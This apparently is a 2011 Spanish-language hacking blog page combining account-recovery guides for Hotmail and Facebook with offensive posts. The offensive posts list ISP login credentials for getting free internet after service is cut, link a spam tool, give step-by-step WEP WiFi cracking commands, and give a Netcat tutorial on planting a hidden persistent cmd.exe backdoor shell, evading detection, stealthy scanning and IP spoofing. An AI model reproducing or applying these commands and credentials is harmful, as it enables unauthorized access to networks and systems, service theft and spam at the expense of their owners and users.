[L]abels

lunes, 12 de septiembre de 2011

¿Cómo Recuperar una Cuenta de MSN Messenger / Hotmail?


messenger ¿Cómo Recuperar una Cuenta de MSN Messenger / Hotmail?
Hace poco nuestros amigos de Internautismo Crónico, uno de los referentes en cuanto a critica política y humor en Colombia, sufrieron un acceso no autorizado a sus cuentas de Twitter y Facebook dejandolos incomunicados de su audiencia por un tiempo; Al enterarnos de lo sucedido decidimos ofrecerles nuestra colaboración para restablecer sus cuentas, logrando en tiempo récord recuperar el acceso a su cuenta de Twitter y al día siguiente su cuenta en Facebook.
Hasta aquí la historia va bien y tiene un final feliz, el problema es que después que recuperáramos las cuentas de Internautismo Crónico, la avalancha de peticiones para recuperar este tipo de servicios a personas afectadas ha crecido de forma exponencial, lo que me ha obligado a revivir este post que tengo desde hace unos años para redireccionar estas peticiones a un solo sitio y que me dejen terminar mi charla para la ekoparty.
….
El acceso no autorizado a cuentas de correo electrónico es uno de los delitos cometidos mas frecuentemente, no solo en Latinoamérica, sino alrededor del mundo, normalmente quien accede a estas cuentas es una persona cercana a nosotros, a la que le interesa la información que tengamos en nuestra casilla de correo, (pareja, familiar, amigo) y en un numero mas reducido de casos son personas que han capturado nuestra información por cualquier otro medio (captura de trafico, software malicioso, ingeniería social, etc…), para distintos propósitos como pueden ser la difamación, suplantación de identidad, difusión de malware, etc…
No importa quien accedió a tu correo electrónico o mensajería instantánea, si estas en leyendo esto es por que te interesa recuperarlo cuanto antes, pero quiero que sepas que por lo menos en Colombia, el acceso NO AUTORIZADO a tu información privada es penalizado por nuestra legislación, específicamente el ARTICULO 269F de la ley 1273 del 2009 dice:
Artículo 269F: Violación de datos personales. El que, sin estar facultado para ello, con provecho propio o de un tercero, obtenga, compile, sustraiga, ofrezca, venda, intercambie, envíe, compre, intercepte, pulgue, modifique o emplee códigos personales, datos personales contenidos en ficheros, archivos, bases de datos o medios semejantes, incurrirá en pena de prisión de cuarenta y ocho (48) a noventa y seis (96) meses y en multa de 100 a 1000 salarios mínimos legales mensuales vigentes.
Por tanto deberías denunciar el caso a las autoridades pertinentes para que este delito no quede impune, como pasa en la mayoría de los casos…. Una vez aclarado esto, paso a mostrarte la forma mas simple de recuperar tu cuenta de Messenger o Hotmail LEGALMENTE:
Lo primero que tenemos que hacer, es ingresar al sitio https://account.live.com/resetpassword.aspx (el aspecto del sitio puede cambiar con el tiempo, pero la esencia NO, por lo que este articulo puede servirte aunque el sitio parezca diferente)


Recupear Hotmail 1 ¿Cómo Recuperar una Cuenta de MSN Messenger / Hotmail?  

Existen varias formas de perder el acceso a nuestra cuenta de correo en hotmail, puede que no te acuerdes de la clave, o que no puedas entrar por otro motivo, pero en este articulo solo detallaremos la recuperación de una cuenta MSN Messenger de Hotmail, si esta fue usurpada por otra persona, por eso seleccionamos la opción “Creo que otro usuario esta usando mi cuenta de Windows Live ID” (aunque los pasos en los otros casos son muy similares y este articulo puede servirte de ejemplo)


Recupear Hotmail 2 ¿Cómo Recuperar una Cuenta de MSN Messenger / Hotmail?


Ingresamos la cuenta que deseamos recuperar y ponemos el código CAPTCHA para demostrar que somos humanos, luego damos en “Siguiente”


Recuperar Hotmail 3 ¿Cómo Recuperar una Cuenta de MSN Messenger / Hotmail?


Suponiendo que quien ha robado tu cuenta, se tomo el trabajo de cambiar tanto el correo alternativo, como la pregunta secreta (muy común en estos casos), pasamos directamente al contacto con el soporte al cliente (aunque puedes intentar los 2 pasos previos por si el “atacante” fue lo suficientemente torpe para dejar esos datos en tu cuenta).


Recuperar Hotmail 4 ¿Cómo Recuperar una Cuenta de MSN Messenger / Hotmail?


Volvemos a poner la cuenta que deseamos recuperar y un nuevo correo donde se pondrán en contacto con nosotros para solicitarnos alguna información y  darnos los datos de recuperación de nuestra cuenta.


Recuperar Hotmail 5 ¿Cómo Recuperar una Cuenta de MSN Messenger / Hotmail?


Llenamos toda la información que nos solicitan en el formulario y esperamos a que el soporte técnico se comunique con nosotros al correo que suministramos, para devolvernos el acceso a nuestra cuenta.
Como pueden ver recuperar una cuenta de Hotmail / Messenger es muy sencillo, no se dejen engañar por métodos “mágicos”, software o cualquier otro procedimiento distinto al que Microsoft nos suministra para recuperar nuestra cuenta si perdemos control sobre ella.

Algunos consejos adicionales POST recuperación:

  • Analizar tu computador y todos los computadores de confianza desde donde accedes a tu cuenta, con un software Anti Keyloggers y un buen Anti Virus ya que es muy común el uso de Keyloggers o Malware para robar tus datos de acceso.
  • NO ingresar a tus cuentas de correos o redes sociales, desde conexiones publicas (Centros Comerciales, Universidades, Congresos, Terminales, Aeropuertos, Restaurantes, Etc…) y desconfía de cualquier conexión que este abierta (sin seguridad).
  • Utiliza una contraseña segura, que tenga mínimo 8 caracteres combinados entre números, letras y símbolos (#@!*&^%. etc..) que sea fácil de recordar, pero difícil de adivinar.
  • Nunca publiques tu clave, y si  es de vida o muerte hacerlo, cambia tu contraseña y tu pregunta secreta, tan pronto puedas hacerlo.
  • No abras archivos adjuntos, ni accedas a enlaces de personas desconocidas, si la persona que te lo envía es conocida, preguntale primero qué es antes de abrirlo, muchas veces el malware envía enlaces y adjuntos maliciosos desde las cuentas de tus conocidos sin que ellos se enteren.
Espero que este articulo les sea de utilidad y como les prometí les dejo los enlaces para recuperar cuentas de Twitter y Facebook  (que es bastante similar a este proceso).

Si te ha gustado el post, compartelo y ayudanos a crecer.

¿Cómo Recuperar una Cuenta de Facebook?

Después de colaborarle a nuestros amigos de Internautismo Crónico a recuperar sus cuentas de Twitter y Facebook, prometimos escribir sobre la metodología utilizada para que otras personas que puedan enfrentar una situación parecida, sepan que hacer para recuperar sus cuentas, ya publicamos como recuperar las cuentas de MSN Messenger / Hotmail y Twitter, a continuación les dejo los pasos para Recuperar una cuenta de Facebook.
….
Las cuentas de Facebook se ha convertido en uno de los principales objetivos para los delincuentes informáticos hoy en día, ya que una cuenta robada de Facebook cuesta al rededor de $100USD en el mercado negro y con ella un delincuente puede suplantar la identidad de la víctima, sacar créditos a nombre de ella, también podría hacer parecer a sus contactos que le robaron todo en una ciudad que no conoce, se quedo sin dinero y necesita que le envíen para poder volver a casa, ¿y quien no ayudaría a un familiar que esta en apuros?, una vez el malhechor se hace a una de estas cuentas puede intentar infectar a la lista de contactos de la víctima con algún tipo de malware y así sacarle el máximo provecho a la inversión realizada.


4134413455 42715c72a1 o ¿Cómo Recuperar una Cuenta de Facebook?


Ahora que conoces cuan valiosa es para un delincuente informático tu cuenta de Facebook y cuanto mal puede causarte a ti y a tus contactos, es importante que cuides de ella, utilizando claves fuertes, ingresando siempre desde la conexión segura de Facebook, navegando desde computadores de confianza y no abriendo archivos adjuntos que no estas esperando.
Si lamentablemente has llegado tarde a estos consejos para evitar que roben tu cuenta, y ya has sido víctima de algún delincuente informático, no te eches a llorar que no todo esta perdido, Facebook es consciente de este tipo de robos y ha puesto a tu disposición una serie de herramientas para que puedas recuperar tu cuenta, en caso de que esta fuese robada.


4135210646 627152b72c o ¿Cómo Recuperar una Cuenta de Facebook?


Existen 2 formas de recuperar tu contraseña de Facebook, la primera y mas sencilla de todas es utilizando el servicio “¿Has olvidado tu contraseña?“, haciendo clic en el. Recibirás un mensaje de correo electrónico con los pasos que tienes que seguir para recuperar tu clave de Facebook.
Si tu cuenta ha sido robada y tu correo electrónico también, no te preocupes aun puedes llenar este formulario diseñado especialmente para estos casos, enviar la información que te piden sobre tu cuenta, para que los encargados en Facebook puedan  investigar tu caso y devolverte el acceso a tu cuenta de Facebook.
RECUERDA que en Colombia el acceso NO AUTORIZADO a tu información privada (y dentro de esta categoría se encuentran tus cuentas de correo, redes sociales, etc..) es penalizado por nuestra legislación como puedes ver en el ARTICULO 269F de la ley 1273 del 2009; Por tanto deberías plantearte hacer la denunciar respectiva a las autoridades pertinentes para que el delito no quede impune, como pasa en la mayoría de los casos.
Como vez, es sencillo recuperar tu clave o cuenta de Facebook, solo recuerda tener mas cuidado la próxima vez para que no te vuelva a suceder.

Algunos consejos adicionales POST recuperación:

  • Utiliza una contraseña segura, que tenga mínimo 8 caracteres combinados entre números, letras y símbolos (#@!*&^%. etc..) que sea fácil de recordar, pero difícil de adivinar.
  • No abras archivos adjuntos, ni accedas a enlaces de personas desconocidas, si la persona que te lo envía es conocida, preguntale primero qué es antes de abrirlo, muchas veces el malware envía enlaces y adjuntos maliciosos desde las cuentas de tus conocidos sin que ellos se enteren.
  • NO ingresar a tus cuentas de correos o redes sociales, desde conexiones publicas (Centros Comerciales, Universidades, Congresos, Terminales, Aeropuertos, Restaurantes, Etc…) y desconfía de cualquier conexión que este abierta (sin seguridad).
  • Analizar tu computador y todos los computadores desde donde accedes a tu cuenta, con un software Anti Keyloggers y un buen Anti Virus ya que el uso de estas herramientas es un método comúnmente utilizado para robar tus datos de acceso.
  • Nunca publiques tu clave, y si  es de vida o muerte hacerlo, cambia tu contraseña y tu pregunta secreta, tan pronto puedas hacerlo.
Ademas es recomendable que te leas los Consejos para hacer correcto uso de las redes sociales y la guía para configurar la privacidad en las redes sociales , como también los pasos para recuperar cuentas de Hotmail, Messenger y Twitter.

Si te ha gustado el post, compartelo y ayudanos a crecer.

sábado, 10 de septiembre de 2011

Tener Internet Despues que te lo cortan [chile] By Zero CooL

Hola Mundo..!


Estaba en U [Universidad] y con mi amigo estábamos en el casino y un profe y empezaron hablar de algo de Internet cortado y que se puede conectar yo a lo volado pesque al ultimo y empecé averiguar y la vola cuando el técnico te instala Internet sierto que te da un usuario y una password. bueno lo que tengo entendido que cuando te instalan Internet se demoran para que lo instalen pero si se dan cuenta si te cortan es como mucho leso para que te corten Internet ahí que cortar la linea telefónica y bla.bla.bla...!! entonces lo que hacen es dar de vaja el usuario y el técnico te da un usuario y una password que seria:

usuario : ads + codigo de region + numero de telefono + @ + el tipo de plan que tengas

contraseña : ads + codigo de region + numero de telefono

eh! visto esta cuenta arto lado nose si sera universal o vola

Usuario: prueba2@adsl1024.tie
Pass: 1234

Usurio: instalaciones8@speedymega.terra
Pass: sin pass

aqui ahi mas:

prueba2@adsl1024.tie
prueba2

----------------
Velocidad 1024

ads41358427@speedyavanzado.terra
ads41358427

---------------


Velocidad 160
ads25257326@lineafull.terra
ads25257326

---------------

Velocidad 512
adsl829571@speedybasico.tie
tie7869

-----------------

Velocidad 256
adsl829571@speedybasico.tie
tie7869

-----------------

Velocidad 1024

adsl907767@speedyavanzado.tie
tie7665


---------------------

Velocidad 512

ads25564801@speedybasico.terra
ads25564801

------------


Velocidad 256

ads25564801@speedybasico.terra
ads25564801


--------------

Velocidad 1024

ads26451389@speedyavanzado.terra
ads26451389


-------------------
Velocidad 1024


82625383ADSL@ENTELCHILE
*1ADSL


-------------

Velocidad 1024

ads22222181@speedyavanzado.terra
ads22222181

NOTA: Cuando tenga mas tiempo por que ahora no paso bien problema personal y cuando tenga algo de tiempo o se me pase la depre ago un video tutorial personal!

Saludos!!



Contacto: zero.cool@hotmail.cl




viernes, 2 de septiembre de 2011

Software Para hacer SPAM para el ocio xDDDD!!!

Un dia estaba aburrido en momento de ocio y me puse a googlear y me contrete con este programa para hacer SPAM

Le dejo el video que yo ise >.<




Descarga: http://www.mediafire.com/?s04ywvd48a395j5

jueves, 1 de septiembre de 2011

Cómo crackear las redes WiFi usando BackTrack

La semana pasada les informaba que BackTrack 5 ya estaba disponible para ser descargado. Además les expliqué cómo instalarlo y cómo arrancar tu computadora con el Live CD de BackTrack 5. Pues bien, el día de hoy les traigo una guía paso a paso que les permitirá crackear cualquier red WiFi con encriptación WEP activada usando BackTrack.
Nota: El conocimiento es poder, pero el poder no significa que debes ser un idiota, ni que debas hacer nada ilegal. Saber abrir una cerradura no te hace un ladrón. Este post está hecho con fines meramente educativos.
Como dije anteriormente, usaremos BackTrack 5, aunque da lo mismo que versión de BackTrack utilices, el procedimiento es el exactamente el mismo.
Lo que necesitas:
- Un Live CD de BackTrack.
- Un adaptador o tarjeta de red con capacidad de inyección de paquetes.
- Una red WiFi cercana.
Lo primero de todo es arrancar tu ordenador usando BackTrack, preferiblemente en modo gráfico. Si no sabes cómo, puedes verlo aquí.
Paso 1. Debes abrir una ventana de la terminal o consola y escribir el siguiente comando:
airmon-ng
El comando anterior te dirá cual es tu tarjeta inalámbrica, lo nombres más comunes son wlan0, ra0, eth0 ó eth1, cosas asi por el estilo. Te darás cuenta de cual es nombre de tu adaptador de red. Anota el nombre en un papel.
Paso 2. El siguiente paso es cambiar la MAC de tu ordenador. Para ello debes introducir el siguiente comando:
airmon-ng stop (tarjeta de red)
ifconfig (tarjeta de red) down
macchanger – -mac 00:11:22:33:44:55 (tarjeta de red)
airmon-ng start (tarjeta de red)
Si tu tarjeta de red se llama wlan0, entonces los comandos serían:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger – -mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Si se llama eth0, entonces sería:
airmon-ng stop eth0
ifconfig eth0 down
macchanger – -mac 00:11:22:33:44:55 eth0
airmon-ng start eth0
Dondequiera que veas (tarjeta de red) debes reemplazarlo con el nombre de tu tarjeta de red. Nosotros hemos usado la MAC 00:11:22:33:44:55, pero tú puedes usar cualquiera que se te ocurra.
Paso 3. El siguiente comando te permitirá ver cuáles son las redes WiFi que hay a tu alrededor.
airodump-ng (tarjeta de red)
Va a salir una lista con todas las redes inalambricas alrededor, donde dice el BSSID (MAC del router que da la señal), PWR (Poder de señal), CHN (Canal en que se encuentra la red), ENC (Es el tipo de encriptación) y ESSID (Nombre de la red inalambrica).
Cuando veas la red que deseas crackear, pulsa Ctrl + C para detener la lista. Resalta la fila perteneciente a la red de interés, y tomar nota de dos cosas: su BSSID y su canal (en la columna CH), como se ilustra a continuación. Es evidente que la red que desea crackear debe tener cifrado WEP (en la columna ENC), no debe tener WPA, ni ninguna otra cosa.
Paso 4. Ahora vamos a ver lo que está pasando con la red que hayas eligido y capturar esa información en un archivo.
airodump-ng -c (canal) -w (nombre del archivo) – -bssid (bssid) (tarjeta de red)
Supongamos que la red que deseas crackear está en en canal 1, que deseas nombrar el archivo como ‘prueba’ y que el bssid es 00:00:00:00:00:00 y que tu tarjeta de red es wlan0, entonces el comando sería:
airodump-ng -c 1 -w prueba – -bssid 00:00:00:00:00:00 wlan0

Ahora ya estas capturando datos, ahora fíjate que hay una columna que dice DATA, estos son los paquetes que llevas capturados, para poder descifrar la clave WEP como mínimo deves capturar unos 20,000 paquetes. Yo recomiendo 30,000.
Notarás que puede ir muy lento, esto significa que ninguna persona esta utilizando la red en el momento. Entonces no esta generando trafico y te podria llevar demasiado tiempo llegar a los 20,000 paquetes. Por suerte tu mismo puedes inyectarle tráfico a la red y para eso es el comando siguiente.
Paso 5. Abre una nueva ventana de la consola y escribe el siguiente comando:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (tarjeta de red)
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le diste a tu tarjeta de red al principio
-e es el nombre de la red que estamos atacando
Después de introducir el comando deberían aparecer 4 lineas de codigos y la final debe decir que la conexion ha sido exitosa (“Association successful”), esto significa que estas conectado en capa 2 del router de la red que estás atacando.
Si por alguna razón no te puedse conectar, entonces las causas pueden ser las siguientes:
-La red que quieres atacar esta muy lejos.
-Tu tarjeta de red no puede hacer inyeccion de paquetes.
-El router que quieres atacar tiene seguridad para evitar este tipo de ataques.
Paso 6. Ahora para inyectarle el tráfico introducce el siguientes comando:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (tarjeta de red)
Donde:
-b es el bssid de la red que estamos atacando.
-h es la MAC falsa que le dimos a tu tarjeta de red inalámbrica.
Verás que que se empezaran a inyectar paquetes, si vas a ver a la otra terminal donde estás capturando los paquetes te darás cuenta que la columna  de DATA ahora avanzará mucho más rápido.
Dependiendo de la potencia de la red que estés atacando este proceso podría tomar algún tiempo. Es cuestión de que dejes el ordenador trabajar y vayas a dar una vuelta hasta que data llegue a 20,000 paquetes.
Paso 7. Una vez que hayas recopilado datos suficientes, es el momento de la verdad. Abre una tercera ventana de la consola y ejecuta el siguiente comando para recuperar que los datos que hemos recogido:
aircrack-ng-b (bssid) (nombre de archivo-01.cap)
Aquí el nombre del archivo debe ser el que escribiste más arriba. Debes ir al escritorio para verlo, es el que tiene la extensión .cap.
Si no has recopilado suficientes datos, aircrack presentará un error y te dirá que vuelvas a intentarlo con más datos. Si tienes éxito, se verá así:
La clave WEP aparece al lado del mensaje “Key Found”. Esto significa que la contraseña se ha descifrado. Puedes copiarla y usarla para conectarte a esa red cuando quieras.




miércoles, 31 de agosto de 2011

Herramientas Forences Moviles (recuperar mensajes borrados, explorar SIM,etc)

Aca les dejo algunas herramientas del tipo forence muchas son de pago pero hay algunas gratuitas
ah! qien no le gusta eso xDDDDDDDDDDD!!!

Cell Seizure, software comercial.

Mobiledit!, comercial con versión gratuíta reducida.

GSM XRI, comercial.

SimCON, comercial.

ChipIT, gratuíta, es un explorador de SIMs.

Evident Talks ForensicSIM, comercial. Destinado a controlar discrepancias entre SIMs clonadas.

PhoneBase2, para extracción y análisis SIM.

Sim Manager Pro, comercial.

SIMQuery, gratuíta, orientada a la extracción de ICCID y IMSI de tarjetas SIM.

SIMScan, gratuíta, para analizar la funcionalidad de SIMs.

UndeleteSMS, gratuíta, para recuperar mensajes

TULP2G es un desarrollo del Netherlands Forensic Institute, y su principal objetivo es la extracción y decodificación de datos de disponisitivos móviles, concretamente, teléfonos móviles y tarjetas SIM, ya que pese a que TULP2G pretende ser un framework de forensia completo, en la actualidad los plugins que trae están orientados a teléfonos y SIMs exclusivamente.

Buno nada mas espero que les sirva...

la ultima herramienta que es gratuita y la ma completa solo sirve para plataformas Windows y que requiere, desde esta nueva versión, .NET 2.0 para poder funcionar.

saque los links de sahw.com

saludos

NETCAT PARA NEWBIES Y JUGANDO CON NETCAT

UTORIAL DE NETCAT PARA NEWBIES

En resumen Netcat realiza y acepta conexiones TCP Y UDP. ¡Eso es todo! Netcat escribe y lee los datos en este tipo de conexiones hasta que se cierren. Proporciona un subsistema de conexión a red básico basado en TCP/UDP que permite a los usuarios interactuar en forma normal o mediante secuencias de comandos con aplicaciones de red y servicios sobre la capa de aplicación. Nos permitirá ver datos TCP y UDP en bruto antes de que sean recubiertos por la siguiente capa superior, tal como FTP, SMTP, o HTTP. Antes de continuar debo decirte que tendrás que tener Netcat en C:WINDOWSSystem32 por cuestiones que no soy primordiales de este manual.

LINEA DE COMANDOS

La línea básica de comandos para Netcat es nc [opciones] host puertos, donde host es la dirección IP que se desea analizar y puertos es o un  determinado puerto o un rango de puertos o una serie de puertos separados por espacios. Echemos un vistazo a cada una de las opciones.

-d Permite que nc trabaje en forma silenciosa y se desenganche del indicador de comandos MS-DOS.
-e Un nc a la escucha podrá ejecutar el en el instante en que alguien se conecte al puerto en el que está escuchando.
-i Intervalo de espera, que es la cantidad de tiempo que nc esperará entre dos envíos de datos sucesivos.
-g Se pueden especificar hasta 8 opciones –g en la línea de comandos para forzar que su tráfico nc pase por determinadas direcciones IP.
-G Esta opción le permitirá definir que dirección IP va a ser el siguiente salto dentro de la ruta indicada con la opción –g.
-l Activa el modo escucha de nc.
-L Activa el modo escucha de nc pero con más interés.
-n Indica a nc que no realice ninguna consulta de nombres de hosts.
-o Realiza un volcado hexadecimal de los datos y los almacena en un archivo hexadecimal.
-p Le permite especificar el puerto local que va a utilizar nc.
-r Nc elegirá aleatoriamente los puertos locales y remotos.
-s Especifica la dirección IP de origen que deberá utilizar nc cuando efectue sus conexiones.
-t Es capaz de controlar la negociación de opciones Telnet.
-u Indica a nc que utilice UDP en lugar de TCP.
-v Informa el estado de nc, si pones otra –v podrás obtener más información.
-w Controla cuanto tiempo va a esperar nc antes de dar por terminada una conexión.
-z Le dice a nc que envíe la cantidad de datos necesarias para conocer en que puertos se está escuchando algo.

OBTENER ACCESO REMOTO A UNA SHELL

Si se ejecuta el comando nc.exe  -l –p4455 –e cmd.exedesde una ventana del símbolo del sistema en una plataforma basada en Windows NT o Windows 2000, cualquiera que realice un Telnet al puerto 4455 de dicha plataforma se encontrará con una shell DOS sin tener que iniciar una sesión en ella.

Bastante elegante, pero también da un poco de miedo. Casi sin esfuerzos acabamos de obtener un indicador de comandos en el sistema atacado. Naturalmente, en los sistemas Windows NT y Windows 2000, tendrá los mismos privilegios y servicios que el usuario que ejecute Netcat. Si creamos de esta manera una puerta trasera en Windows 95 y Windows 98obtendremos un control completo.
Vamos a seguir profundizando en este comando, recuerden que de forma predeterminada Netcat se ejecutará en la ventana DOS que se haya iniciado, este hecho significa que la ventana de control de comandos tendrá que permanecer abierta mientras Netcat se encuentre en ejecución. Emplearemos la opción –d para separarla del indicador de comandos.

Código:
C:>nc.exe –l –p 4455 –d –e cmd.exe

De ésta forma, podremos ocultar una puerta trasera basada en Netcat.

Sin embargo si alguien realiza un Telnet al puerto 4455 y se conecta, tan pronto como se finalice la conexión, Netcat pensará que su trabajo ha terminado y dejará de escuchar. Para evitar esto utilizaremos la opción –L diciéndole a Netcat que escuche con más interés incluso después de haber finalizado la conexión.

Código:
C:>nc.exe –p 4455 –d –L –e cmd.exe

Esto nos permitirá volver al sistema hasta que el administrador de dicho sistema descubra la puerta trasera. Y para evitar que nos descubra podemos cambiar el nombre de nc.exe por cualquier otra cosa. Nota: en este ejemplo yo tengo nc.exe que voy a mover en C: y no en C:WindowsSystem32



Cualquiera podrá ignorar algo tan aparentemente inofensivo como update.exe. Otra característica de Netcat es que si lo utilizamos sin ninguna opción en la línea de comandos, nos pedirá que la introduzcamos en la primera línea de la entrada estándar.



EXPLORACION SILENCIOSA DE PUERTOS

Como Netcat puede hablar con un rango de puertos, un uso muy obvio sería utilizarlo como explorador de puertos. La opción –z es la respuesta. Ésta opción le dirá a Netcat que envía una determinada cantidad de datos a algún puerto, pero dicha cantidad solo será suficiente para saber si el puerto está abierto o no. En éste caso utilizaremos la opción –v o –vv ya que sin por lo menos una –v no podremos ver el resultado de la exploración. Aquí estoy haciendo una exploración de puertos a 127.0.0.1 desde el 139 hasta el 145. Obtuve como resultado que solo se encuentran abiertos el 139,141 y 142.



Pero esta forma de hacerlo no es la mas correcta que digamos porque algunas aplicaciones de cortafuegos, bloquearan determinada dirección IP si reciben demasiadas conexiones sobre ella en un periodo muy corto de tiempo. Para que no nos suceda esto Netcat permite hacer exploraciones de una manera más discreta, tan discreta que no parecerá una exploracion de puertos. Se podrá utilizar la opción –i y configurar un intervalo de prueba y la opción –r para lo haga de forma aleatoria.Puede hacerse este mismo procedimiento para los puertos UDP solo agregándole –u a la línea de comandos.

SUPLANTAR UNA DIRECCION IP

Suplantar una dirección IP resulta sencillo. Los cortafuegos que realizan enmascaramiento  o una traducción de las direcciones de red suplantan diariamente direcciones IP. Estos dispositivos toman un paquete desde una dirección IP interna, cambian la dirección IP origen del paquete a su propia dirección IP, lo envían por la red y deshacen las modificaciones cuando vuelven a recibir los datos desde el destino. Por ello, decimos que modificar los contenidos de la dirección IP origen en un paquete IP resulta sencillo. Lo que si es difícil es ser capaz de recibir datos desde una dirección IP suplantada.

Netcat dispone de la opción –s que nos permitirá especificar la dirección IP que deseemos. Cualquiera podria iniciar una exploración de puertos utilizando la opción –s para hacer pensar que estan siendo explorado por Microsoft o el FBI. Sin embargo, el problema nos viene cuando deseamos reenviar las respuestas emitidas por el puerto suplantado a nuestra dirección IP real. Supongamos, por ejemplo, que el host de destino piensa que ha recibido una petición de conexión de Microsoft, intentará enviar un mensaje de reconocimiento a dicha ip de Microsoft.  Naturalmente, esta dirección IP no tendrá idea de lo que está hablando el host de destino y enviará un reset. ¿Cómo podemos enviar la información de vuelta a la dirección IP real sin que seamos descubiertos?

En lugar de atacar a la maquina destino, la única otra opción viable es utilizar el encaminamiento dependiente del origen. El encaminamiento dependiente del origen permite a una aplicación de red especificar la ruta que desea seguir para llegar a su destino.

Existen dos tipos de encaminamiento dependiente del origen: estricto y relajado. El encaminamiento dependiente del origen estricto significa que el paquete debe especificar cada salto a realizar en la ruta hasta llegar al host de destino. Algunos routers y otros dispositivos de red siguen permitiendo el encaminamiento dependiente del origen estricto, pero muy pocos permiten el encaminamiento dependiente del origen relajado. El encaminamiento dependiente del origen relajado indica a los routers y a los dispositivos de red que los routers pueden efectuar la mayor parte del encaminamiento hasta llegar al host de destino, este proceso nos permitirá hacer que el paquete pase por nuestra maquina al regresar. Utilizando este método el encaminamiento dependiente del origen puede permitir que suplantemos una direccion IP y que obtengamos las respuestas a su viaje de vuelta. La mayoría de los routers ignoran las opciones del encaminamiento dependiente del origen, pero no todos.

La opción –g de Netcat nos permitirá especificar hasta 8 saltos que deberá dar el paquete antes de llegar a su destino, por ejemplo: nc –g 10.10.4.5 –g 10.10.5.8 –g 10.10.7.4 –g 10.10.9.9 10.10.9.50 23 entrará en contacto con el puerto telnet en 10.10.9.50, pero si las opciones del encaminamiento dependiente del origen se encuentran activadas sobre routers intermedios, tráfico se verá forzado a seguir la ruta a través de estas 4 ubicaciones antes de alcanzar su destino. Si intentamos nc –g 10.10.4.5 –g 10.10.5.8 –g 10.10.7.4 –g 10.10.9.9   –G 12 10.10.9.50 23, en este comando estaremos especificando un puntero de salto utilizando la opción –G. La opción –G configurará el puntero de salto al n-simo byte (en este caso el duodecimo) y como las direcciones IP tienen 4 bytes de longitud, el puntero de salto comenzará en 10.10.7.4. Por lo que en su camino a 10.10.9.50, el tráfico necesitará atravesar únicamente las dos ultimas maquinas (porque de acuerdo con el puntero de salto ya hemos estado en las primeras). Sin embargo en el viaje de vuelta el paquete si pasará por las 4 maquinas.


JUGANDO CON NETCAT




le dejo .doc (word) .PDF .Video y el NC Tutoriales obiamente de netcat

Index

-[Doc]Jugando-con-NetCat_I
-[Doc]Jugando-con-NetCat_II
-[Doc]Jugando-con-NetCat_III
-[Doc]Jugando-con-NetCat_IV
-[Doc]Jugando-con-NetCat_V
-[Doc]Jugando-con-NetCat_VI
-[PDF]Jugando-con-NetCat_I
-[PDF]Jugando-con-NetCat_II
-[PDF]Jugando-con-NetCat_III
-[PDF]Jugando-con-NetCat_IV
-[PDF]Jugando-con-NetCat_V
-[PDF]Jugando-con-NetCat_VI
-[Video]Jugando-con-NetCat_I
-[Video]Jugando-con-NetCat_II
-[Video]Jugando-con-NetCat_III
-cliente_nc
-cliente_nc_cf
-servidor_nc
-servidor_nc_cf

Link: http://test.drawcoders.net/netcat/

Saludos